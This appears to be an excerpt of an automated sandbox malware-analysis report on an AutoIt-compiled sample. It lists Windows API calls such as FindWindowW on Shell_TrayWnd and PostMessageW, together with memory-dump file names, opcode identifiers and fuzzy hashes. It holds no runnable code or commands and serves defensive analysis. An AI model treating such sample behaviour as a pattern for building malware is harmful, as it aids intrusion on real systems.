                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _strncmp
                                                                                                                                                                            • String ID: ,$UTF8)
                                                                                                                                                                            • API String ID: 909875538-2632631837
                                                                                                                                                                            • Opcode ID: abd9c85c193eb76a615b38e8260140970f327620044c052ec7ea970ca86f7e2a
                                                                                                                                                                            • Instruction ID: b3c6803870d1b21283bf32431af321d4190ac902c568a1d8b2e557ddf245ca97
                                                                                                                                                                            • Opcode Fuzzy Hash: abd9c85c193eb76a615b38e8260140970f327620044c052ec7ea970ca86f7e2a
                                                                                                                                                                            • Instruction Fuzzy Hash: 1E01D875A043805BE720DE20CC85B6773A19B4131AF68492FD8D6872A1F73DD449C75B
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560BA
                                                                                                                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                                                            • wsprintfW.USER32 ref: 004560E9
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend_mallocwsprintf
                                                                                                                                                                            • String ID: %d/%02d/%02d
                                                                                                                                                                            • API String ID: 1262938277-328681919
                                                                                                                                                                            • Opcode ID: dc5fd9a877cd0fc352ed6de9b5f97ee6fb2dcbb154e3a48ad4a1e49fbb654ae8
                                                                                                                                                                            • Instruction ID: 2a73c44ac592e0fe880a68d863bd42ca8887a008949f121bccc13d44bcf2ebb3
                                                                                                                                                                            • Opcode Fuzzy Hash: dc5fd9a877cd0fc352ed6de9b5f97ee6fb2dcbb154e3a48ad4a1e49fbb654ae8
                                                                                                                                                                            • Instruction Fuzzy Hash: 13F08272744220A7E2105BA5AC01BBFB3D4EB84762F10443BFE44D12C0E66E8455D7BA
                                                                                                                                                                            APIs
                                                                                                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0044226C
                                                                                                                                                                            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0044227F
                                                                                                                                                                              • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FindMessagePostSleepWindow
                                                                                                                                                                            • String ID: Shell_TrayWnd
                                                                                                                                                                            • API String ID: 529655941-2988720461
                                                                                                                                                                            • Opcode ID: 62d1e1a02585172d548c808ed695c1d9d3028cc69dace886715b1b3d1423c17e
                                                                                                                                                                            • Instruction ID: f0ed9326d30a696a9ade51716a531e8bd1705000bbe21894ac7a57cb5589152b
                                                                                                                                                                            • Opcode Fuzzy Hash: 62d1e1a02585172d548c808ed695c1d9d3028cc69dace886715b1b3d1423c17e
                                                                                                                                                                            • Instruction Fuzzy Hash: 71D0A772F8130177E92077706D0FFCB26246F14710F010C3AB305AA1C0D4E8D440C358
                                                                                                                                                                            APIs
                                                                                                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00442240
                                                                                                                                                                            • PostMessageW.USER32(00000000), ref: 00442247
                                                                                                                                                                              • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FindMessagePostSleepWindow
                                                                                                                                                                            • String ID: Shell_TrayWnd
                                                                                                                                                                            • API String ID: 529655941-2988720461
                                                                                                                                                                            • Opcode ID: d3682f88803cb2a3efb7847c83fab5a73234bf1983908037f6894d5424c159e3
                                                                                                                                                                            • Instruction ID: d1e5b9be119239975405e397b0c0efdc35250005003305bf123d4268f2ecb06f
                                                                                                                                                                            • Opcode Fuzzy Hash: d3682f88803cb2a3efb7847c83fab5a73234bf1983908037f6894d5424c159e3
                                                                                                                                                                            • Instruction Fuzzy Hash: 4DD05E72B813013BE92076706D0FF8B26246B14710F010C2AB205AA1C0D4E8A4408358
                                                                                                                                                                            APIs
                                                                                                                                                                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00439522
                                                                                                                                                                              • Part of subcall function 00411A1F: _doexit.LIBCMT ref: 00411A2B
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Message_doexit
                                                                                                                                                                            • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                            • API String ID: 1993061046-4017498283
                                                                                                                                                                            • Opcode ID: 98c4a6cf209f69c689245cd57ea7e643062e7ce984d6ae84015e6f4dd77dfbd0
                                                                                                                                                                            • Instruction ID: 5d68346425d2699d55792fe39b85c2381918ba1f955abba655776c5540820644
                                                                                                                                                                            • Opcode Fuzzy Hash: 98c4a6cf209f69c689245cd57ea7e643062e7ce984d6ae84015e6f4dd77dfbd0
                                                                                                                                                                            • Instruction Fuzzy Hash: 82B092343C038627E20437A01C0BF8C28049B64F42F220C2AB308384D259D90080231E